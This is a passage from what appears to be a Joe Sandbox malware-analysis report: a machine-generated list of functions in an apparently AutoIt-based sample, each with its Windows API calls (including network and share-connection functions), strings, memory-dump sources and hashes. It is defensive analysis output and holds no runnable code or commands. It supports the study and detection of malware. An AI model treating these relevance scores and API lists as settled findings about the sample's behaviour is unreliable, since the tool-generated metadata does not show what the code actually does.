String ID:
API String ID: 2889604237-0
Opcode ID: 9a61a617a88eaad4ad60ae71b11762f39f77065ca280985bb0decddbb5312aa1
Instruction ID: 4f99f51eee6d29c698bdec28b1d2fca9b97e654aef7865967084f8690c5ea211
Opcode Fuzzy Hash: 9a61a617a88eaad4ad60ae71b11762f39f77065ca280985bb0decddbb5312aa1
Instruction Fuzzy Hash: 91E0EEB5800204AFCF019FA0C80869E7BF1BB6C322F10802AFA5AA7262DB3C9141DF40

Function 00849A72 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00827652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0082758C,80070057,?,?), ref: 00827698

_memset.LIBCMT ref: 00849B28
_memset.LIBCMT ref: 00849C6B

Strings

NULL Pointer assignment, xrefs: 00849CF0

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memset$lstrcmpi
String ID: NULL Pointer assignment
API String ID: 1020867613-2785691316
Opcode ID: 21ca4f49c45f5a435a256c1e99870ccd973e18d4b86a431d43616c9eb5c83217
Instruction ID: 9b9edd5e3f5a3452808b7ae726b2ccd76a8af5d5867566a559395fc66aef07e0
Opcode Fuzzy Hash: 21ca4f49c45f5a435a256c1e99870ccd973e18d4b86a431d43616c9eb5c83217
Instruction Fuzzy Hash: FD911871D0022DEBDB20DFA5DC85ADEBBB9FF08710F20415AE519A7241EB755A44CFA0

Function 0082B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0082B981

Strings

Container, xrefs: 0082B8FE
AutoIt3GUI, xrefs: 0082B8F9

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: a4838e6b70406f8731edd7d1c9d83a2e206c9d3f459a1eb2e75c640df2a38fd2
Instruction ID: 571d3852896c3248e721632c77dd9c308d1956105b7edd7dbc1d4cf3e11dd497
Opcode Fuzzy Hash: a4838e6b70406f8731edd7d1c9d83a2e206c9d3f459a1eb2e75c640df2a38fd2
Instruction Fuzzy Hash: A3915C706016159FDB24DF68D884A6ABBF8FF48710F14856EF94ACB791EB70E880CB50

Function 0083B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 007EFEC6: _wcscpy.LIBCMT ref: 007EFEE9

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

__wcsnicmp.LIBCMT ref: 0083B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0083B361

Strings

LPT, xrefs: 0083B292

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 58bca7c6be7f1c7dff1ab565ea070fc95084be410985404f52781d964e320940
Instruction ID: 95ed060c6f2d81c34af2769b6d34493bc924da632b5a2ddac1c048ac55246f32
Opcode Fuzzy Hash: 58bca7c6be7f1c7dff1ab565ea070fc95084be410985404f52781d964e320940
Instruction Fuzzy Hash: 04613EB5A00219EFCB14DB94C895EAEB7F4FB48310F11415AFA46EB391DB74AE40CB90

Function 00818A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00818B1E
_memmove.LIBCMT ref: 00818B78

Strings

Oa~, xrefs: 00818BF2, 0081E39A, 0081E3B6

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memmove
String ID: Oa~
API String ID: 4104443479-1339823410
Opcode ID: f026f5bb92be255d78c7c9dc1a3a8278eed627b05b6396ee54df8797c35c650c
Instruction ID: 55fba1bea51b29be40f00524af7c6053b9b5d646cd601bafcfc53218ee70cfdf
Opcode Fuzzy Hash: f026f5bb92be255d78c7c9dc1a3a8278eed627b05b6396ee54df8797c35c650c
Instruction Fuzzy Hash: 7B518EB0A00609DFCB24CF68C885AEEBBF5FF44314F14452AE85AD7240EB31A995CB51

Function 007E2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 007E2AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 007E2AE1

Strings

@, xrefs: 007E2AD5

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: a534a2ce476d5258d0153bfe1e4c1a37778bf69cd51b9d75ed4d57a094a2713b
Instruction ID: 1afc257705bad995a0a072b495c9d3b8f00616fcd71bf1ced68e77cbcd36864d
Opcode Fuzzy Hash: a534a2ce476d5258d0153bfe1e4c1a37778bf69cd51b9d75ed4d57a094a2713b
Instruction Fuzzy Hash: 7F515872418745DBD320AF10D88ABABBBF8FF84310F42885DF2D9511A5DB348969CB16

Function 008399BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 007D506B: __fread_nolock.LIBCMT ref: 007D5089

_wcscmp.LIBCMT ref: 00839AAE
_wcscmp.LIBCMT ref: 00839AC1

Strings

FILE, xrefs: 008399FA

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 5159355a21ef5ac2b9dc7c1e76d82056aa8dbdff38f00534527ee52fe61a6d90
Instruction ID: 61181efcd4949b9da3544649f84dc191c9915ac541d868d1c0e8bdafa131e575
Opcode Fuzzy Hash: 5159355a21ef5ac2b9dc7c1e76d82056aa8dbdff38f00534527ee52fe61a6d90
Instruction Fuzzy Hash: 8241CA71A00619BBDF209AA4DC85FEFBBBDEF85714F00047AF940F7281D6B59A0487A1

Function 00842882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00842892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008428C8

Strings

|, xrefs: 00842899

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 0433907dfa3e6726f447f8528d9f53ff646b0e3eb387cb13949049544517f784
Instruction ID: 2bdd5b9999732c20e152772fa784696c1825532533f6389977d4e22f96518bf4
Opcode Fuzzy Hash: 0433907dfa3e6726f447f8528d9f53ff646b0e3eb387cb13949049544517f784
Instruction Fuzzy Hash: FF311C7180411DEFCF059FA1CC89EEEBFB9FF08340F10402AF915A6266EA355956DB60

Function 00856CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00856D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00856DC2

Strings

static, xrefs: 00856D22

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 741f0c3fb8b04dd611c6ef2ae31da10cad2d6e9192250a8c8a3bb79a2046ba83
Instruction ID: ed63707daf57216542feea6f5c8fdfc14b36a5906a4540c0146373a6f69a06ec
Opcode Fuzzy Hash: 741f0c3fb8b04dd611c6ef2ae31da10cad2d6e9192250a8c8a3bb79a2046ba83
Instruction Fuzzy Hash: F6319E71200604AADB109F68CC80AFB77B9FF48761F508619FDA5D7190EB35AC95CB60

Function 00832D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00832E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00832E3B

Strings

0, xrefs: 00832DF9

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 86e3ea3ebb086b347e9f79e85be546830ecd79997d131df38ed5dae5b143fa27
Instruction ID: d1f8a65aca6d8b1eb0a68c3c89f2c087a30f4e250dc972b4ae615810ce7ce91b
Opcode Fuzzy Hash: 86e3ea3ebb086b347e9f79e85be546830ecd79997d131df38ed5dae5b143fa27
Instruction Fuzzy Hash: 3831FD31600309EBDB24DF98C8467AE7BF5FF85350F140069E985D71A2E7749944CB90

Function 00856943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008569D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008569DB

Strings

Combobox, xrefs: 0085699D

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: e741209dfa1aa3d5572f367dd00319b7275bcb3c3a86d6b466a60003e180d1d3
Instruction ID: 6fa485be9715602f9fe0c6f42a2bc16a3056b67236045e9d989d907014c9c04b
Opcode Fuzzy Hash: e741209dfa1aa3d5572f367dd00319b7275bcb3c3a86d6b466a60003e180d1d3
Instruction Fuzzy Hash: C511E2713002087FEF119E24CC80EBB3BAAFB993A5F540125FD58D7290E6359C6587A0

Function 00856E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91

GetWindowRect.USER32(00000000,?), ref: 00856EE0
GetSysColor.USER32(00000012), ref: 00856EFA

Strings

static, xrefs: 00856EBD

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 8bf5286a38da019383397ea66e5cc606395bb8e08d518f45e8de226bd17f635e
Instruction ID: fec273fa70aa87c928621ab02fa08b7ea560279c0623b0184f5fd162279dc03c
Opcode Fuzzy Hash: 8bf5286a38da019383397ea66e5cc606395bb8e08d518f45e8de226bd17f635e
Instruction Fuzzy Hash: 08215972A10209AFDB04DFA8CD45AFA7BB8FB08355F044629FD55D3250E734E8659B50

Function 00856B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00856C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00856C20

Strings

edit, xrefs: 00856BF5

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: d4142257d89fcbf1b76111ae7bc06a0ecdb918f173f3e895c68ba4833d2d8e4f
Instruction ID: c0f74cfbb60a0b84528ed8a5fe3bb06530e1a16565bf89bb60340180289a9636
Opcode Fuzzy Hash: d4142257d89fcbf1b76111ae7bc06a0ecdb918f173f3e895c68ba4833d2d8e4f
Instruction Fuzzy Hash: A2119D71500208ABEB108E649C41AAB376AFB1437AF904724FE60D71E0E735DCA89B61

Function 00832E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00832F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00832F30

Strings

0, xrefs: 00832F07

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: c925d1ee5cff7790aaca99d17b435c427a5bd4adeb938d682979c3459870efd2
Instruction ID: 82fb41ac2bfe7f41d0fe73b2b01906761583ff2e32fe82f4eb0e1f6d061cef74
Opcode Fuzzy Hash: c925d1ee5cff7790aaca99d17b435c427a5bd4adeb938d682979c3459870efd2
Instruction Fuzzy Hash: 4311C431901228ABDB31EB58DC45BA977B9FB85354F1800B6E954F72A1EBB0EE04C7D1

Function 008424CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00842520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00842549

Strings

<local>, xrefs: 00842511

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: bc0e06345c084a23a4911d7a067a45d37f7d9dea251f14ce2b150c015fc339aa
Instruction ID: 307daef4f49a198160a7671daa9cc18faa4f02f1ae5db2998adcef138b5e8db1
Opcode Fuzzy Hash: bc0e06345c084a23a4911d7a067a45d37f7d9dea251f14ce2b150c015fc339aa
Instruction Fuzzy Hash: C211027050922DBADB249F518C98EBBFF68FF06355F50812AF905C3040D2B46980DAF0

Function 008480A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0084830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008480C8,?,00000000,?,?), ref: 00848322

inet_addr.WS2_32(00000000), ref: 008480CB
htons.WS2_32(00000000), ref: 00848108

Strings

255.255.255.255, xrefs: 008480E3

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 0b7060087ff1bcc6797de2e095469f397a469d8170a99cdef4e7afe45a472516
Instruction ID: 666f2935da1c8148d3ca2f1577ec2fbbac67e96a8670b935855b452c3e275161
Opcode Fuzzy Hash: 0b7060087ff1bcc6797de2e095469f397a469d8170a99cdef4e7afe45a472516
Instruction Fuzzy Hash: 80118E34600319EBDB20AFA8DC46FADB774FF04320F108527EA11D7292DB72A8158695

Function 008292E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00829355

Strings

ListBox, xrefs: 0082931F
ComboBox, xrefs: 008292F4

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 7d3ba028f89bc4073a6aefa4eda55b83360cf25def11182cac7b71e04598eec2
Instruction ID: 30598f20a981746d3c85350eb6e59b157eac8571ab2daa329a8e7a449968272b
Opcode Fuzzy Hash: 7d3ba028f89bc4073a6aefa4eda55b83360cf25def11182cac7b71e04598eec2
Instruction Fuzzy Hash: 1C01D271A01228ABCB04EB64CC96CFE7769FF06320B140619F872973D1EB355848C650

Function 008291DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

